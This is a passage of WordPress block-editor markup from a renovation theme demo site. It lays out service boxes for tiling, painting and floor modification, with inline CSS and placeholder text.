15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-fa386f1d-9b22-436e-92d5-84b6fc145ee9 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-fa386f1d-9b22-436e-92d5-84b6fc145ee9 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-fa386f1d-9b22-436e-92d5-84b6fc145ee9\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/services/tiling/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":28,\"title\":\"services-img2\",\"filename\":\"services-img2.jpg\",\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/services-img2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:37.000Z\",\"modified\":\"2021-05-25T13:48:37.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"8af869eca5\",\"delete\":\"667bc07c15\",\"edit\":\"3755558faf\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=28u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":3796,\"filesizeHumanReadable\":\"4 KB\",\"context\":\"\",\"height\":65,\"width\":77,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/services-img2.jpg\",\"height\":65,\"width\":77,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":77,\"resshowPrefix\":false,\"counterId\":\"6afabe81-7584-44b5-9f5d-ccbe76d9b4cb\"} -->\n<style type=\"text/css\"> .skt-blocks-block-6afabe81-7584-44b5-9f5d-ccbe76d9b4cb .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-6afabe81-7584-44b5-9f5d-ccbe76d9b4cb .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-6afabe81-7584-44b5-9f5d-ccbe76d9b4cb .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-6afabe81-7584-44b5-9f5d-ccbe76d9b4cb .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-6afabe81-7584-44b5-9f5d-ccbe76d9b4cb .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-6afabe81-7584-44b5-9f5d-ccbe76d9b4cb .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-6afabe81-7584-44b5-9f5d-ccbe76d9b4cb .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-6afabe81-7584-44b5-9f5d-ccbe76d9b4cb.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-6afabe81-7584-44b5-9f5d-ccbe76d9b4cb.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-6afabe81-7584-44b5-9f5d-ccbe76d9b4cb .skt-blocks-ifb-image-content img {\n width: 77px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-6afabe81-7584-44b5-9f5d-ccbe76d9b4cb.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-6afabe81-7584-44b5-9f5d-ccbe76d9b4cb.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-6afabe81-7584-44b5-9f5d-ccbe76d9b4cb .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-6afabe81-7584-44b5-9f5d-ccbe76d9b4cb.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-6afabe81-7584-44b5-9f5d-ccbe76d9b4cb.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-6afabe81-7584-44b5-9f5d-ccbe76d9b4cb .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-6afabe81-7584-44b5-9f5d-ccbe76d9b4cb.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-6afabe81-7584-44b5-9f5d-ccbe76d9b4cb skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/services-img2.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Tiling</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/services/tiling/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":2,\"blockId\":\"958088ca-214e-43cd-b709-bbac59c3dc2d\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-958088ca-214e-43cd-b709-bbac59c3dc2d .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-958088ca-214e-43cd-b709-bbac59c3dc2d .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-958088ca-214e-43cd-b709-bbac59c3dc2d .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-958088ca-214e-43cd-b709-bbac59c3dc2d .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-958088ca-214e-43cd-b709-bbac59c3dc2d .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 2px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-958088ca-214e-43cd-b709-bbac59c3dc2d\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/services/painting/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":29,\"title\":\"services-img3\",\"filename\":\"services-img3.jpg\",\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/services-img3.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img3/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img3\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:37.000Z\",\"modified\":\"2021-05-25T13:48:37.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"1df582acb1\",\"delete\":\"75ddbb8dd1\",\"edit\":\"b8f84e66c7\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=29u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":2302,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":67,\"width\":59,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/services-img3.jpg\",\"height\":67,\"width\":59,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":59,\"resshowPrefix\":false,\"counterId\":\"e5ea6a5d-e529-491b-8f8f-ee91450fc7db\"} -->\n<style type=\"text/css\"> .skt-blocks-block-e5ea6a5d-e529-491b-8f8f-ee91450fc7db .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-e5ea6a5d-e529-491b-8f8f-ee91450fc7db .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-e5ea6a5d-e529-491b-8f8f-ee91450fc7db .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-e5ea6a5d-e529-491b-8f8f-ee91450fc7db .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-e5ea6a5d-e529-491b-8f8f-ee91450fc7db .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-e5ea6a5d-e529-491b-8f8f-ee91450fc7db .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-e5ea6a5d-e529-491b-8f8f-ee91450fc7db .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-e5ea6a5d-e529-491b-8f8f-ee91450fc7db.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-e5ea6a5d-e529-491b-8f8f-ee91450fc7db.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-e5ea6a5d-e529-491b-8f8f-ee91450fc7db .skt-blocks-ifb-image-content img {\n width: 59px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-e5ea6a5d-e529-491b-8f8f-ee91450fc7db.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-e5ea6a5d-e529-491b-8f8f-ee91450fc7db.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-e5ea6a5d-e529-491b-8f8f-ee91450fc7db .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-e5ea6a5d-e529-491b-8f8f-ee91450fc7db.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-e5ea6a5d-e529-491b-8f8f-ee91450fc7db.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-e5ea6a5d-e529-491b-8f8f-ee91450fc7db .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-e5ea6a5d-e529-491b-8f8f-ee91450fc7db.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-e5ea6a5d-e529-491b-8f8f-ee91450fc7db skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/services-img3.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Painting</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/services/painting/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"aba7fd00-e60d-4ef5-88c7-1f2d0218e379\",\"topPadding\":30,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"className\":\"gb-renovation-services\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services skt-blocks-block-section-outer-wrap block-aba7fd00-e60d-4ef5-88c7-1f2d0218e379 background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-aba7fd00-e60d-4ef5-88c7-1f2d0218e379 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-aba7fd00-e60d-4ef5-88c7-1f2d0218e379 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-aba7fd00-e60d-4ef5-88c7-1f2d0218e379 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 30px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-aba7fd00-e60d-4ef5-88c7-1f2d0218e379.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-aba7fd00-e60d-4ef5-88c7-1f2d0218e379.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-aba7fd00-e60d-4ef5-88c7-1f2d0218e379.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-aba7fd00-e60d-4ef5-88c7-1f2d0218e379.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-aba7fd00-e60d-4ef5-88c7-1f2d0218e379.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-aba7fd00-e60d-4ef5-88c7-1f2d0218e379 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-aba7fd00-e60d-4ef5-88c7-1f2d0218e379 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-aba7fd00-e60d-4ef5-88c7-1f2d0218e379.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-aba7fd00-e60d-4ef5-88c7-1f2d0218e379 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-aba7fd00-e60d-4ef5-88c7-1f2d0218e379.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-aba7fd00-e60d-4ef5-88c7-1f2d0218e379 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-aba7fd00-e60d-4ef5-88c7-1f2d0218e379.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"columns\":3,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"baa8eb5f-6747-4b91-be71-543873b072a6\"} -->\n<style type=\"text/css\"> .block-baa8eb5f-6747-4b91-be71-543873b072a6 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-baa8eb5f-6747-4b91-be71-543873b072a6 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-baa8eb5f-6747-4b91-be71-543873b072a6 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-baa8eb5f-6747-4b91-be71-543873b072a6 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-baa8eb5f-6747-4b91-be71-543873b072a6 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-baa8eb5f-6747-4b91-be71-543873b072a6 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-baa8eb5f-6747-4b91-be71-543873b072a6 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-baa8eb5f-6747-4b91-be71-543873b072a6 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-3\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"6b907a52-fbba-4ec1-9471-196833284d1b\",\"blockBorderRadius\":5,\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-6b907a52-fbba-4ec1-9471-196833284d1b .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-6b907a52-fbba-4ec1-9471-196833284d1b .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-6b907a52-fbba-4ec1-9471-196833284d1b .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-6b907a52-fbba-4ec1-9471-196833284d1b .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-6b907a52-fbba-4ec1-9471-196833284d1b .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-6b907a52-fbba-4ec1-9471-196833284d1b\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;border-radius:5px;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadingTag\":\"h4\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/floor-modification/\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"uploading\":false,\"date\":\"2021-05-28T05:39:15.000Z\",\"filename\":\"floor-modification.jpg\",\"menuOrder\":0,\"uploadedTo\":7,\"type\":\"image\",\"subtype\":\"jpeg\",\"alt\":\"\",\"title\":\"floor-modification\",\"caption\":\"\",\"description\":\"\",\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/floor-modification.jpg\",\"id\":258,\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/home/floor-modification/\",\"author\":\"1\",\"name\":\"floor-modification\",\"status\":\"inherit\",\"modified\":\"2021-05-28T05:39:15.000Z\",\"mime\":\"image/jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 28, 2021\",\"nonces\":{\"update\":\"dc1b7f19b6\",\"delete\":\"1f29bf8951\",\"edit\":\"ed86f5af8b\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=258u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"uploadedToTitle\":\"Home\",\"uploadedToLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=7u0026action=edit\",\"filesizeInBytes\":9306,\"filesizeHumanReadable\":\"9 KB\",\"context\":\"\",\"height\":66,\"width\":111,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/floor-modification.jpg\",\"height\":66,\"width\":111,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":111,\"resshowPrefix\":false,\"counterId\":\"a0a90a85-978e-4c95-865d-266e8f82f88a\"} -->\n<style type=\"text/css\"> .skt-blocks-block-a0a90a85-978e-4c95-865d-266e8f82f88a .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-a0a90a85-978e-4c95-865d-266e8f82f88a .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-a0a90a85-978e-4c95-865d-266e8f82f88a .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-a0a90a85-978e-4c95-865d-266e8f82f88a .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-a0a90a85-978e-4c95-865d-266e8f82f88a .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-a0a90a85-978e-4c95-865d-266e8f82f88a .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-a0a90a85-978e-4c95-865d-266e8f82f88a .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-a0a90a85-978e-4c95-865d-266e8f82f88a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-a0a90a85-978e-4c95-865d-266e8f82f88a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-a0a90a85-978e-4c95-865d-266e8f82f88a .skt-blocks-ifb-image-content img {\n width: 111px; }\n}\n\n@media only screen and (max-width: 